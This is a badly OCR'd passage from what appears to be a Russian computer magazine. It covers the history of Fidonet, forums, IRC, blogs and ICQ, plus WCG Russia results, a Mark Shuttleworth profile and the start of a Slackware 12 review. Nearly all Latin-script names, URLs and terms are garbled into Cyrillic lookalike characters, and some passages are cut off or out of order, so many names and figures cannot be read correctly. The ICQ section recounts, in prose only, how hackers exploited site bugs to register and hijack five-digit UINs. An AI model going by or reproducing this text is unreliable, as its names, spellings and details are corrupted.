направлении, Мицгол назвал Рібопеі ѲІоЬаІ Нурегіехі ІпіегсЬапде, или 
сокращенно іід-Ыдб. Создана документация Р6НІ ІІРІ_, описывающая 
основные типы фидошных II Р Сов, идет разработка интеграции Фидо в 
браузер Еігеіох ит.д. 

Дошло до того, что вице-премьеру правительства РФ Дмитрию Медведе- 
ву входе инет- конференции в марте этого года был задан вопрос отлица 



Сергея Соколова. Речь шла о гипертекстовом векторном Фидонете и о 
правительственной поддержке такого рода проектов. Медведев сообщил, 
что он специально зарегистрировался в Фидонете, посмотрел, что это 
за «зверь», и согласился, что гипертекста там действительно не хватает. 
Также Медведев заметил, что этот вопрос актуален, так какФидонетон 
нашел весьма интересным :). 

ФОРУМЫ 

Форум — пришедшее к нам в результате эволюции сетей типа Еісіопеі 
и ІІзепеІ; понятие. Прародителями форумов были ВВ5 (Виііеііп Воагб 
Бузіепп, электронные доски объявлений), ньюсгруппы, эхи и тому подоб- 
ные вещи, популярные в 80-90-е годы. Асамо слово «форум» и вовсе 
перекочевало из латыни. Форум (отлатинского іогит) — это площадь для 
массового тематического общения. 

Первые веб-форумы начали появляться в 90-х в основном на движке II В В 
(Шітаіе Виііеііп Воагб). Структуру и принцип их работы можно опустить, 
ведь мы с тобой имеем дело с форумами и по сей день, причем практиче- 
ски втом же самом виде. 

Наиболее крупные и посещаемые доски рунета — это: 
іогит.іхЫ.сот — сами ІХВТ утверждают, что это «крупнейшее в мире 
сообщество специалистов и обычных пользователей Сети»; 
Фгитз.оѵегсіоскегз.ги — все о железе, софте, разгоне и прочей ІТ- 
тематике; 

зехпагосі.гц — название говорит само за себя :); 

кіпо-доѵпо.сотЛогитз — место встреч киноманов, киноманьков и прочих 
синефилов; 

ЬеппеіЬ-аппип.гиЛогит — культовое и довольно старое место, начинав- 
шее как форум поклонников Толкиена и переросшее в огромное дружное 
комьюнити. 

А вот наиболее популярные сегодня движки (исходя из количества ин- 
сталляций) в порядке убывай ия: ѵВиІІеііп (ѵВиІІеііп), Іпѵізіоп Роѵѵег Воагб, 
рбрВВ, сизіот, ІІВВ (ІІВВ) ит.д. 

ІКС И ВЕБ-ЧАТЫ 

Само собой, человеческие потребности, как и прогресс, не стоят на месте, 
и люди стали стремиться кобщению в режиме онлайн. Форумы и перепис- 
ка — это хорошо, нолучшее — врагхорошего, верно?В 1988 году финский 
студент Ярко Ойкаринен придумал систему общения в режиме реального 
времени — ІРС (Іпіегпеі Реіау С На!) . В ее основе лежит протокол РРС 
1459, который ориентирован на работу с текстом, без какой-либо графики. 
Благодаря этому«ирка» работает какчасы на любом компе (независимо 
от мощности машины) и практически не создает трафика. Также, в отли- 
чие от появившихся позднее веб-чатов, ІРС не обновляет страницу раз в 
несколько секунд, чтобы подгрузить информацию, он работает в прямом 
смысле опііпе. 

Известность и популярность кирке пришла после 1991 года, когда в 
ІРС онлайн транслировали собранную со всего мира информацию, 
касающуюся проведенной операции «Буря в пустыне». Кстати, 
аналогичным образом складывалась ситуация все в том же 1991-м, 
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во время путча в СССР — москвичи посредством ІРС рассказывали 
миру, отом что происходило в городе. 

Структура ІРС проста, как и все гениальное: серверы, чаще не 
отдельные, а соединенные друг с другом, образуют сеть. Внутри сеть 
делится на тематические каналы (которых великое множество, ведь 
собственный канал может создать каждый), к примеру #1і п их или 
#кі по . Общаться можно и приватно; подключившись ксети, можно 
легко найти нужного человека и поговорить лично с ним. Поддержи- 
вает ІРС и передачу файлов: от пользователя к пользователю и при 
помощи специальных ботов. Боты берут файлы с сервера хозяина или 
качают файл из сети и затем отсылают юзеру. Всевозможных ботов в 
и рке вообще довольно много. По сути, человек, решивший написать 
своего бота, ограничен лишь временем, синтаксисом скриптов и 
собственной фантазией. 

Наиболее известные и старые сети — это ІПСІУеІ и ЕШеС отколовшиеся от 
первой ІРС-сети. Также популярны ОиакеЫеі и ОАиМеТ 
Если говорить о русских сетях, то тут за первое место уже много лет борют- 
ся РивЫеі и ВАЕЫеі.РІІ. Русский ДАЛНетбыл образован выходцами из 
ДАЛНета международного. Сеть активно развивалась, но все не бывает 
гладко, и в стане сетян произошел раскол, разделивший сеть надвое: 
РАЫНеСРЦ и сіаі.пеі.ги . Обе сетки стараются стать тем самым «старым 
русским ДАЛ Нетом», каким он был когда-то. 

Вечные антагонисты ІРС — веб-чаты — появилисьв начале 90-х. На 
первых порах их отличительной чертой были тормоза (сейчас это уже 
нетакактуально, как некогда). Веб-чаты оперировали графикой, благо- 
даря чему они имели разнообразные, красивые интерфейсы, но все это 
приводило клагам. Более простые в использовании и демократичные 
веб-чаты всегда привлекали больше «казуалов», чем ІРС, с которым 
еще нужно разобраться. 

Среди знаковых веб-чатов рунета можно выделить, например, кгоѵаіка.ги, 
созданный еще в далеком 1996 году студентом МГУ, в Сети известным под 
ником Арт. Чат до сих пор очень популярен, давно имеет домен второго 
уровня (начинала Кроватка на сервере сИаі-гасІіо.ппБи.пеІ: ). По сути, сей- 
час Кроватка представляет собой не просто чат, а многофункциональный 
портал. В 2004 году она номинировалась на Премию рунета как лучший 
развлекательный портал. 

Живое сетевое общение породилотакие ресурсы, как ЬавЬ.огд и появив- 
шийся позднее ЬавЬ.огд.ги — сайты, на которых исходно собирали самые 
смешные цитаты из ІПС-логов и куда потом добавились и цитаты из чатов, 
асек, с форумов и со всея Сети. 

БЛОГИ 

Блог — от англ ий с ко го Ыод, от ѵѵеЬ Іод, «сетевой журнал, или 
дневник событий» (Википедия). Это, пожалуй, самое популярное и 
модное на сегодняшний день средство сетевого общения, которо- 
му многие аналитики этого рынка предрекают бол ьшое будущее. В 
том, кто был первым блоггером, разные источники расходятся. Но 
общепринятая версия гласит, что им был Тимоти Джон Бернерс- 
Ли, известный британский ученый, отец ѴѴѴѴѴѴ. На своей личной 



страничке он, с 1992 года публиковал новости. Первые блоги и 
были не чем иным, какличными сайтами, обновлявшимися вруч- 
ную. 

Блогосфера начала набирать популярность в 90-е годы. Стали появляться 
сервисы, бесплатно предоставляющие каждомужелающему возмож- 
ность открыть свой блог. Пионерами этого движения стали хапда.сот, 
орепсііагѵ.сот . Ііѵещигпаі.сот . Судьбоносной отметкой в истории блогов 
считают момент, когда в 1999 году компания Руга Баба открыла сервис 
Віоддег, впоследствии приобретенный компанией Ѳоодіе. 

Сегодня этих сервисовтакое количество, что они струдом поддаются 
подсчету. На Западе, например, наиболее известен тув расе .сот , вто 
время каку насболее популярны ЖЖ (живой журнал, Ііѵещигпаі.сот ). 
ІіѵеіпІегпеСги и сііагѵ.ги . 

Благодаря развитиютехнологий, блог — это отнюдь не всегда текст. На- 
бираютобороты и популярностьаудио- и видеоблоги. Известные сервисы 
предоставляютсвоим пользователям возможность самим выбрать способ 
подачи информации (правда, опции аудио- и видеовещания, как прави- 
ло, доступны лишь платникам). Также актуально ведение видеодневников 
натомже УоиТиЬе.сот и подобных порталах. 

С блогами связано много интересного, втом числе и множество 
скандалов. К примеру, в 2004 году компания Арріе подала на 
блоггеров в суд за то, что те опубликовали материалы о новых 
товарах Арріе, еще не вышедших в продажу. Компания требовала 
выдать источник утечки информации. Но суд приравнял блогге- 
ров кжурналистам и постановил, что они имеют полное право 
держать свои источники в секрете. Известны и случаи уволь- 
нения людей с работы за определенные публикации в личных 
блогах. А некоторым же благодаря своим журналам, напротив, 
удалось прославиться. 

ПОСЛЕДНЕЕ СЛОВО ТЕХНИКИ 

Самыми последними достижениямитехнического прогресса в рассмат- 
риваемой области можно назвать программы типа 5 куре, позволяющие 
общаться в режиме онлайн в голосовом и видеочате. Кактолько широ- 
кополосный интернет вошел в обиход и люди перестали считатьтрафик, 
сердца пользователей завоевали УоиТиЬе, 5 куре и им подобные. 

Во многих клиентах других программ, скажем, в М5Ы, также естьанало- 
гичные интегрированные функции, ноБкуре исходно ориентирован на 
ІР-телефонию и почти совсем живое общение. 

Программы для голосового общения используются повсеместно: для де- 
ловых конференций, для общения и координации в онлайн- играх (чаще 
всего для этих целей юзаютѴепігіІо и ТеатБреак), для связи с друзьями и 
близкими, которые находятся далеко. Встроенный голосовой чат стано- 
вится обязательным требованием, который пользователи предъявляют к 
играм и программам. Еще бы, ведь это действительно удобно. 

Судя по тому, какими темпами развиваются сетевые средства обще- 
ния, можно предположить, что следующим этапом будет передача 
по сети запахов (кстати, над этим успешно работают японские 
ученые) и других ощущений. ~іг 
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ИЛЬЯ АЛЕКСАНДРОВ 

/ АІ_ЕК8АЫОПОѴ.І@САМЕІ_АЫО.ПІІ / 



ИСТОРИЯ ШИ АСИ Ф 

ХРОНИКИ КОМПАНИИ тлвіиз 




Я НЕ ПОМНЮ, КОГДА ВПЕРВЫЕУСЛЫШАЛ ПИСК ИНТЕРНЕТ-ПЕЙДЖЕРА. ЗАБЫЛ, КАКОЕ 
БЫЛО МОЕ ПЕРВОЕ СООБЩЕНИЕ. КАЖЕТСЯ, ЧТО АСЬКА БЫЛА В МОЕЙ ЖИЗНИ ВСЕГДА. 
О КОМПАНИИ, СОЗДАВШЕЙ СЕТЕВОЙ ФЕНОМЕН. О МІРАВІЫ5. 



ИСТОРИЯ 

Все началосьздесь, в государстве Израиль, в северной части Тель-Авива. 
Сегодня тут можно наблюдать множество айтишных фирм самых разных 
специализаций. 

Их было четверо, молодых друзей, решивших сказать свое слово в исто- 
рии сети. Яйр Голдфингер, Арик Варди, Сефи Вигисер и Амнон Амир. Яйр 
и Амнон имели степени бакалавров в области математики, а Арик и Сефи 
были тогда всего лишь выпускниками средней школы. Проект, который 
задумали молодые люди, был программой для передачи сообщений в 
сети. И вот 1 5 ноября 1 996 года самая первая версия I СО коннектится 
к ісц-пп ігаЬіиз.сот. Предлагаю запомнить эту дату и каждое 15 ноября 
пропускать рюмочку-другую во время онлайновых бесед. 



Теперь немного о названиях. I СО, какизвестно каждой школьнице, явля- 
ется аббревиатурой, созвучной санглийским «I зеекуои». Кому в голову 
пришла мысль о таком сокращении, мы не знаем, но мысль оказалась 
очень удач ной. О названии компании: МігаЬІІіз — это женское имя, в 
переводе с латинского означающее «чудесный, удивительный». 
Удивительная историятети Аси началась. 

1997 ГОД 

Программное обеспечение от МігаЬІІіз, распространяемое бесплатно и 
предлагающее пользователю беспрецедентную функцию «интернет-пей- 
джер», с первых дней приобрело огромную популярность. 

Ксередине года I СО имела уже несколько миллионов пользователей пре- 
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Ш ициальный сайттети Аси 



имущественно подросткового возраста, юзающих клиент почти каждый 
день. Разработчики без устали трудились над новыми версиями софта, но 
проект продолжал оставаться некоммерческим. Всего лишь хобби, в то 
же время ставшее частьюжизни других людей. 

«У аськи не было конкурентов», — вспоминал позже Джим Даттон из 
компании Асііѵегве, его фирма в тот год тоже пыталась начать выпуск 
интернет-приложения, реализующего протокол одноканального чата. 
В проекте Даттона фигурировала онлайновая офисная среда, которая 



обладателем прав на нашу любимую аську стала Атегіса Опііпе. Ав- 
торам проекта за их детище было выложено околотрехсот миллионов 
долларов. Воттак некоммерческий проект студентов и школьников 
сделал их миллионерами. 

Кконцу года ІСО имела уже десятки миллионов зарегистрированных 
пользователей, клиент для общения в сети не сходил с первой позиции 
на Роѵѵпіоасі.сот . 

Місговой наконец-то всерьез занялась своим М5ІМ... 



«НЕ ЖЕЛАЯ ОТСТАВАТЬ ОТ КОНКУРЕНТОВ, ДРУГИЕ СЕТЕВЫЕ ГИГАНТЫ, ТАКИЕ КАК ТШШАЫ 
И АТ&Т, ТОЖЕ РАЗРАБОТАЛИ СВОИ КЛИЕНТЫ ДЛЯ ОБЩЕНИЯ, КОТОРЫЕ СНОВА БЫЛИ ОРИ- 
ЕНТИРОВАНЫ В ТОМ ЧИСЛЕ И НА ПОЛЬЗОВАТЕЛЕЙ ДРУГИХ КОМПАНИЙ» 



должна была помочь передавать информацию в больших компаниях. 
Но они опоздали и тут — МігаЬІІІв выпустила сервер для предприятий 
летом 1997 года. Почему я заговорил об Асііѵегзе? Да потому, что со- 
трудники этой фирмы были приглашены в М іеговой делать протокол 
ІМ. Видимо, успех аськи сильно встревожил соратников товарища 
Гейтса. 

1998 ГОД 

В 1 998 году борьба за пользователей между различными системами об- 
мена сообщениями обострилась. Крупнейший американский провайдер 
Атегіса Опііпеусовершенствовал свой Аоііпвіапі Меввепдег (АІМ), и 
каждый клиент провайдера теперь автоматически регистрировался в 
АІМ’е. 

Понятно, что при этом юзеровуАІМ было даже больше, чем у ІСО. 
Но популярность аськи продолжала возрастать с космической ско- 
ростью, несмотря на то что денег в раскрутку никто не вкладывал. 
Не могла при этом оставаться в стороне и компания Місгозой. Активно 
распространялись слухи о том, что М іеговой собирается приобрести 
МігаЬІІІв. М5Ы Меввепдег сделан еще не был, корпорация слишком ув- 
леклась войной браузеров, вытесняя с рынка Ыеізсаре. Но и МігаЬІІІв к 
тому времени уже была крупной компанией с двумя офисами — в Тель- 
Авиве и Нью-Йорке и со штатом сотрудников, насчитывающим почти 
1 00 человек. 

Тогда в дело вмешался отец Ар и ка Вард и, известный израильский 
бизнесмен. Он был против продажи ІСО компании Місгозой, и в итоге 



НА ВЕРШИНЕ УСПЕХА 

Популярность сетевых пейджеров вызвала интерес к протоколу ІМ 
у других лидеров мира ИТ. Компания АсЬѵегве, которая так и не смогла со- 
ставить конкуренцию ІСО, была приобретена фирмой СМОІ, в которой ее 
то объединяли, то разъединяли с разными структурами, пытаясь начать 
что-то делать, но в итоге проект был закрыт. 

В 1999 году происходит столкновение М іеговой и Атегіса Опііпе. М5Ы 
Меввепдег обладал возможностью вести переписку с юзерами АІМ. АО І_, 
нежелая делиться лидерством на рынке, перестраивает работу серверов, 
заставляя их блокировать переписку с софтом от Місгозой. А последняя 
выпускает патч к М5І\І, устраняющий эту проблему. 

Борьба между монстрами мира ИТ длиласьдве недели. В конце концов, 
контора Гейтса предпочла не иметь дело с абонентами АОЬ. Выпущенная 
в ноябре 1 999 года версия М5М уже не пыталась коннектиться к чужим 
серверам. 

Нежелая отставать от конкурентов, другие сетевые гиганты, такие как 
ТгіШап и АТ&Т, тоже разработали свои клиенты для общения, которые 
снова были ориентированы втом числе и на пользователей других ком- 
паний. Но в АОЬ не приветствуют идею объединения всех пользователей. 
В конце концов их аська вытеснит все остальные клиенты... 

Дальнейшие события происходили на наших глазах. Місгозой пыталась 
уничтожить аську также, как Ыеізсаре, интегрировав свой интернет- 
пейджер в систему. В МігаЬІІІв неуставали совершенствоватьсвой 
сервис: были добавлены новые функции, создан центр развлечений ІСО, 
выпущен ІСО Ьііе. Большим успехом пользовалась функция отправки зтв 
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«РЕГИСТРАЦИЯ ШЕСТИЗНАЧНЫХ НОМЕРОВ НАЧАЛАСЬ С НОМЕРА 
100000 В 1996 ГОДУ И БЫЛА ЗАКОНЧЕНА В 1997-М. ДАЛЕЕ ЮЗЕРАМ 
РАЗДАВАЛИСЬ СЕМИЗНАКИ. ВОСЬМИЗНАЧНЫЕ УИНЫ МОЖНО БЫЛО 
ПОЛУЧИТЬ С КОНЦА 1998-ГО ПО 2000 ГОД» 



на мобильныетелефоны. МігаЬіИз разработала Хігаг-центр, в который 
были включены дополнительныеутилиты: игры, мультичат, отправка 
поздравительных открыток. 

В 2005 году на свет появляется первая официальная русскоязычная вер- 
сия I СО, поддерживаемая Рамблером. Среди поклонников официального 
клиента РатЫег-ІСО получила признание, да и раскрутка бренда была на 
уровне. Рамблер даже проводил вечеринку, посвященную дню рождения 
I СО в России. Фестиваль-концерт посетили околотрехтысяч человек. 

3 февраля 2006 года МігаЬіІів внесла изменения в протокол, в резуль- 
тате которых перестали работать альтернативные клиенты, вроде 
Мігапсіа и О I Р. 

Проблема была оперативно решена выпуском обновлений, хотя юзеры 
аналоговых клиентов до сих пор опасаются, что когда-нибудь ихлюбимым 
«крысам» и «квипам» перекроют доступ к протоколу. 

ИНТЕРЕСНЫЕ ФАКТЫ 

Регистрация шестизначных номеров началась с номера 100000 в 
1 996 году и была закончена в 1997-м. Далее юзерам раздавались се- 
мизнаки. Восьмизначные уины можно было получить с конца 1 998-го 
по 2000 год. 

В начале 2000-х пользователям при регистрации приписывался девяти- 
значный номер. Причем в первые недели регистрация была последова- 
тельной, то есть номера изменялись на одну-две цифры. «Случайная», 
смешанная регистрация была введена чуть позже. 

Кстати, в 1996 году существовали четырех- и дажетрехзначныеуины! Они 
предназначались бета-тестерам и в последствии были удалены. 

ЗНАМЕНИТЫЕ БАГИ ІСО 

ІСЦКеВіг^ЬВид 

Все номера, зарегистрированные с 7 декабря 2000 года по 1 марта 
2001 года, имели тип ІЫѴАЫ0 0АТАВА5Е РІЕЮ5. Потом они сменились 
на ВЕІ_ЕТЕВ, ЗІІЗРЕІЧЮЕО, но стандартного, правильного типа СООй 
АСС01Л\ІТ5 среди них не было. 

Используя этот баг, хакер из Швеции асІ4 написал свою программу ІСО 
РеВігіЬ, способную регистрировать пятизначные номера аськи. Но 
воспользоваться этими номерами никак неудавалось, они не коннекти- 
лись к серверу. 

Тогда этой проблемой занялся наш соотечественник Зіагп. Сначала он про- 
сто поменял детали на сделанных РеВігіЬ-номерахс помощью уязвимости 
на портале ісд.сот . когда после очистки поля пароля хакеры получали 
доступ кизменению инфы. Но подключиться по-прежнему неудавалось. 
Тогда Зіат заюзал утилиту ІСОІпбо, которая позволяла вводить в поле етаіі 
что угодно без символа 0. Зіат вбил номера своих пятизнаков с деся- 
тисимвольным паролем 1234567890. Ксерверуаська подключилась, но 
работатьтаким хитрым способом с официальным клиентом не получалось. 
Выход нашелся в виде консольной программки гшІСО, известной 
любителям Линукса. С помощью т ІСО хакеры получили возможность 
сидеть на своих угнанных уинах. 51ат утверждал, что только он лично 



зарегистрировал около двухсот пятизнаков. 

Халяву прекратили через несколько дней. Техслужба МігаЬіІів заметила 
удивительное «воскрешение» номеров, и практически все они были 
удалены... 

ТЬеО\/пІТВид 

Программка РеВігіЬ больше не работала, но баг в ѴѴЬІіерадев ІСОостался, 
и, используя десятизначный пароль, все еще можно было менять детали 
уинов, в том числе и п рай мари- мейл. Это вдохновило асІ4 и людей из его 
команды на написание ЕідЫ ѴѴопбегОѵѵп ІТ! . 

Оѵѵп ІТ использовала в качестве пароля десятисимвольную последо- 
вательность цифр или символ пробела и позволяла менять примаки. 
Товарищ 2 еІІ 2 тап с помощью этой проги угнал себетакие номера, как 
1 1 11 1 1 1,1 10000 ит.д. Что сними произошло в дальнейшем, незнаю.при 
желании каждый может выяснить. В сентябре 2001 года эту восхититель- 
ную лазейку в веб-интерфейсе устранили. 

ТЬе Кегиггес+іоп Вид оГ Зрасоот 

29 июня 2002 года русский хакер Зрасоот испытал большое потрясение. 
Общаясь с одним из членов ІСО-сцены, онзаметил, что тотсидитна 
уинах, которые Зрасоот регал, еще используя РеВігіЬ! Он начал про- 
верять список, и — о чудо — все его аськи работали. Сменив пароли на 
нормальные, он получил около 500 рабочих номеров. Зрасоот предполо- 
жил, что это произошло из-за восстановления старой базы ІСО, ноточная 
причина случившегося неизвестна. 

Будучи уверенным, что через пару дней МігаЬіІів пятизнаки уничтожит, 
хакер добродушно раздал их на ІРС, но номера никто удалять не стал. 




Кстати, каждый такой номерок сегодня стоит около 300 баксов... 

Все эти баги я привожу здесь, чтобы отдать даньтем временам, когда ІСО- 
сцена только зарождалась. Какты понимаешь, объем статьи не позволяет 
мне рассказать обо всехуязвимостях, да это и не было моей задачей. 
Впрочем, коротко упомяну еще об одной. 

Это самый серьезный баг, и случился он в этом году, причем отнюдь не по вине 
хакеров. Из-за сбоя в работе сервера в марте этого года аська была недоступ- 
на всем двумстам миллионам пользователей на протяжении 1 1 часов. Суици- 
дов среди фанатов мессенджера зарегистрировано, впрочем, не было. □с 
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10-12 августа в Москве прошел финал отборочного тура на 
крупнейший киберспортивный турнир года — ѴѴогІсІ СуЬегСатез. 
Геймеры из 11 регионов России разыграли призовой фонд в раз- 
мере 2 500 000 рублей, предоставленный генеральным спонсором 
и глобальным партнером мероприятия — Затзипд Еіесігопісз, 
а также сразились за 22 путевки в США, где в грядущем октябре 
и состоится мировое первенство. В ходе национальной квали- 
фикации определились призеры в восьми дисциплинах: пяти 
компьютерных, прошедших при поддержке «железного» спонсора 
состязаний — ІРЫ, а также трех консольных, организованных бла- 
годаря новому партнерству устроителей с компанией МісгозоШ 
Одними из самых напряженных выдались матчи по Соипіег-Зітіке 5x5. 



В турнире не участвовала самая титулованная команда страны — Ѵігіиз. 
Рго, однако ее многочисленные воспитанники и текущие игроки 
представляли сразутри столичных клана. В результате победили те, 
среди которых «виртусов» оказалось больше, — сборная солянка под 
названием «КРОВЬ», за которую выступили РОМЛ<Е, ЬеХ, Моек, 8а Ну и 
Тагіипсі. 

Красивые бои продемонстрировали и мастера неувядающего ЗіагСгаТС: 
Вгоосіѵѵаг. Второе и третье место заняли многоопытные Апсігоісіе и Ех, 
неоднократно участвовавшие в ѴѴСѲ 0 га п б Еі па I. Чемпионом же неожи- 
данно для всех стал ЗВ.Ыо^оги, ранее не хватавший звезд с неба. А вот 
один из главных фаворитов, Асіѵокаіе, даже не пробился в восьмерку 
сильнейших, □с 



□ 

ОШМТЕВ-БТРІКЕ 5X5 (РС): 

1 место — КРОВЬ — $12200 + поездка на ѴѴС6 6Е в США; 

2 место — Ведгір Ѳатіпд — $6000; 

3 место — \оѵІе — $4000. 

5ТАВСРАРТ: ВВОООѴѴАВ іХі (РС): 

1 место — Зй-Ыо^оги — $3000 + поездка на ѴѴС6 6Е в США; 

2 место — ІР.Ех — $1500 + поездка на ѴѴС6 СЕ в США; 

3 место — Зй.АпсІгоісІе — $1000 + поездка на ѴѴС6 СЕ в США. 

ѴѴАВСВАРТ III: ТНЕ РВ02ЕІЧ ТНВОМЕ 1X1 (РС): 

1 место — ^пабс.ХуІідап — $3000 + поездка на ѴѴС6 СЕ в США; 

2 место — ІР.ЗѵѵіК — $1500 + поездка на ѴѴС6 СЕ в США; 

3 место — ггюиг.Тііап — $1000. 

РІРА 07 1X1 (РС): 

1 место — ЫоА-АІеххх — $3000 + поездка на ѴѴСѲ СЕ в США; 

2 место — НакегЫа — $1500 + поездка на ѴѴС6 ѲЕ в США; 

3 место — ѴѴеР — $1000 + поездка на ѴѴСѲ ѲЕ в США. 



□ 

МЕЕО РОВ БРЕЕй: САВВОМ 1X1 (РС): 

1 место — Ѵігіиз.рго-АІап — $3 000 + поездка на ѴѴСѲ ѲЕ в США; 

2 место - ІЧІТВОІІБ - $1500 + поездка на ѴѴСѲ ѲЕ в США; 

3 место — ѴігІшз.рго-Мг.Разег — $1000 + поездка на ѴѴСС СЕ в США. 

6ЕАВБ ОР ѴѴАВ 4X4 (ХВОХ360): 

1 место — ХЬохРиззіа Теат — 100000 рублей + поездка на ѴѴСѲ ѲЕ в США; 

2 место — 5Ьи-5Ьи — 50000 рублей; 

3 место — Еох-ЬоипсІ-еІііе — 25000 рублей. 

ОЕАО ОР АІ_ІѴЕ 4 іХі (ХВОХ360): 

1 место — Сіагуі — 25000 рублей + поездка на ѴѴСѲ ѲЕ в США; 

2 место — РеаІЕох — 1 2500 рублей; 

3 место — РесІ Сагсііпаі — 6250 рублей. 

РВОЗЕСТ ООТНАМ ВАСШ6 3 ІХі (ХВОХ360): 

1 место — Вооду — 25000 рублей + поездка на ѴѴСС СЕ в США; 

2 место — Ыогпі — 1 2500 рублей; 

3 место — Ьиску — 6250 рублей. 
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ИЛЬЯ АЛЕКСАНДРОВ 

/ АІ.ЕКЗАЫОКОѴ.І@САМЕІ_АЫО.П1І / 





ИГПП : Марк Шаттлворт 

НИК: _ 

БПБРНСТ: 

ШЕСТО ПРПОДИБННИЯ:Лондон (Великобритания) 



БИОГРАФИЯ 

Марк — африканец. Родился в 1973 году в малень- 
ком городке на самом юге материка, рос в Кейптауне. 



В 1995 году, окончив универ, Шаттлворт решает занять- 
ся бизнесом. 

Учрежденная им компания ТЬаѵѵіе сыграла важную роль 
в формировавшемся рынке электронной коммерции, ком- 
пания занималась интернет-безопасностью и цифровыми 
сертификатами. Защита веб-серверов, разработка крипто- 
графических алгоритмов и прочая деятельность сделала 
детище Шаттлворта зесигііу-фирмой номер один в мире, а 
его самого миллионером. 

В 1999 году Марк продает ТЬаѵѵіе за 575 миллионов 
долларов. Как он объяснял, тратить время на прежний 
бизнес ему не хотелось. Скучно стало человеку. Он 



«Я уверен, что со временем все разрабатываемое программное обеспече- 
ние будет свободным. Это будет стандарт де-факто в софтостроении» 



Компьютерами увлекся, проводя время за различными 
играми. Превращение из геймера в компьютерщика 
произошло уже в университете, где Марк получал специ- 
альность «Экономические науки в области финансов и 
информационных систем». Шаттлворт хотел пользоваться 
возможностями студенческой локалки в полном объеме и 
посчитал, что для этого лучше всего подходит І_іпих. При 
таких обстоятельствах и состоялось его знакомство со сво- 
бодным софтом. 



открывает НЕЮ Ѵепіиге Сарііаі, которая занимается пре- 
доставлением стартового капитала предпринимателям, 
инвестициями в ИТ-проекты. Марк не забывает о благо- 
творительности: в 2002 году создается фонд Шаттлворта, 
спонсирующий социальный программы, а также разра- 
ботку свободного программного обеспечения. 

Кстати, друг, ты в детстве не хотел быть космонавтом? Нет? 
А вот Марк очень даже. 

Все в том же 2002 году его мечта осуществляется. За 20 
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миллионов баксов Шаттлворт принимает участие в космической экс- 
педиции на МКС. Месяцы обучения в Звездном городке не проходят 
даром, и теперь Марк может даже давать интервью на русском языке. 
Ныне Шаттллворт — второй космический турист и национальная гор- 
дость ЮАР. Как-никак, первый африканец в космосе. 

После межпланетных путешествий Марк начинает заниматься тем, что 
нам наиболее интересно, — он создает свой дистрибутив І_іпих. 

ішшітіі 

Марк был разработчиком ОеЬіап еще в 90-е, но вернуться к Ыпих 
решил только в 2004-м. Оставаться простым кодером ему было неин- 
тересно, и он решил сделать свою версию ОС, опираясь на хорошо 
известный ОеЬіап. ЫЬипШ (что на языке зулусов означает «гуман- 



каются на протяжении 18 месяцев после релиза. 

Не вдаваясь в подробности технических характеристик ІІЬипіи (наш 
журнал уже неоднократно писал о нем), скажу, что сейчас это, пожа- 
луй, самый распространенный среди линуксоидов дистрибутив. На 
ЫНрУ/зЬіріІ.иЬипІи.сот ты можешь заказать себе диск с ним, который 
тебе с радостью пришлют по почте. 

ЫЬипШ разрабатывают под эмблемой Сапопісаі І_ісІ. — компании 
Шаттлворта, созданной специально для финансирования ореп зоигсе 
проектов. Ответвления дистрибутива — КиЬипіи и ХиЬипіи (которые 
различаются графической рабочей средой, выбранной по умолчанию) 
— также развиваются Сапопісаі. 

Еще Шаттлворт спонсирует программистов рабочего окружения КОЕ, 
за что был объявлен покровителем проекта. 



«Полет в космос? Да, он очень сильно меняет отношение к жизни. Невозможно увидеть 
Землю из космоса и не остаться глубоко впечатленным красотой момента...» 



ность», «человечность») изначально являлся просто форком ОеЬіап, 
имея мало самостоятельных разработок. При этом философия свобод- 
ного софта соблюдается в дистрибутиве до сих пор — программ не из 
разряда ореп зоигсе в ЫЬипіи нет. 

Основное внимание в дистрибутиве уделяется простоте использования 
и удобству, ориентирован он прежде всего на десктопы, а не серверы. 
Новая версия выходит каждые полгода, а зесигі1;у-обновления выпус- 



УВЛЕЧЕНИЯ 

В настоящее время Марк проживает в Лондоне, хотя весь его бизнес 
располагается в ЮАР. 

Утверждает, что любит русскую баню, лимонный мармелад, путеше- 
ствия, музыку Сезарии Эворы. Не переносит бюрократию и публич- 
ные выступления. Очень он скромный, этот странный африканский 
парень... =К= 
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ПИСАТЬ О ГЕРОЕ СЕГОДНЯШНЕГО ОБЗО- 
РА ОДНОВРЕМЕННО И ПРОСТО, ИТЯЖЕ- 
ЛО. ПРИДЕТСЯ ВСЕ ВРЕМЯ ПРИБЕГАТЬ 



Новое, 
знакомство, 
со ста рым д руго і 



Біаскѵѵаге І_іпих 12.0: новая версия попу- 
лярного дистрибутива 



ЮРИЙ «ВОВЕВ» РАЗЗОРЕНОВ 

/ 2І.ОѴ.ВОВК@СМАІІ_.СОМ 



К ПРЕВОСХОДНОЙ СТЕПЕНИ. ЭТО ОДИН 



НЕМНОГО ИСТОРИИ 



ИЗ САМЫХ СТАРЫХ ДИСТРИБУТИВОВ, 
КОТОРЫЙ ПО ПРАВУ СЧИТАЕТСЯ ОДНИМ 
ИЗ САМЫХСТАБИЛЬНЫХ И САМЫХ ПРО- 
СТЫХ ПО УСТРОЙСТВУ. ДЛЯ НОВИЧКА 
ЖЕОН ОДИН ИЗ САМЫХ сложныхв 
ОСВОЕНИИ. ХОТЯ ПОЛЬЗОВАТЕЛЬ, ПОЗ- 
НАКОМИВШИЙСЯ СО СЛАКОЙ ЛЕТ ТАК 5 
НАЗАД, ВЕРНУВШИСЬ, НАЙДЕТ ВСЕ НА 
СВОИХМЕСТАХ. КАКГОВОРЯТ СТОРОН- 
НИКИ ДИСТРИБУТИВА: «ЕСЛИ ТЫ ЗНА- 
ЕШЬ БЬАСКѴѴАРЕ, ТЫ ЗНАЕШЬ ЫІЧЫХ, А 
ЕСЛИ ТЫ ЗНАЕШЬ РЕО НАТ, ТО ТЫ ЗНА- 
ЕШЬ ТОЛЬКО РЕй НАТ». 



Историю Біаскѵѵаге Ыпих ( ѵѵѵѵѵѵ.зіаскѵѵаге.сот ) принято отсчитывать с 
первого релиза, который вышел 14летназад, 17 июля 1993 года. Бес- 
сменным автором и идеологом проекта остается один итотже человек 
— Патрик Волкердинг, который и выполняет большую часть работы. 
Первая версия Слаки базировалась на 5І_5 Ыпих (Боійапсііпд І_іпих Бузует), 
который был на тотмомент самым популярным дистрибутивом. 5І_5 пред- 
лагал пользователям нетолько само ядро Ыпих и основныеутилиты, в его 
состав входил большой набор самого разнообразного программного обес- 
печения, включаяХРгее и стекТСР/ІР. Всеэто, вместе с системой установки 
пакетов, а также простым устройством и стартовыми скриптами ВБО-стиля, 
перекочевало в Біаскѵѵаге. И, можно сказать, тот Біаскѵѵаге дошел до наших 
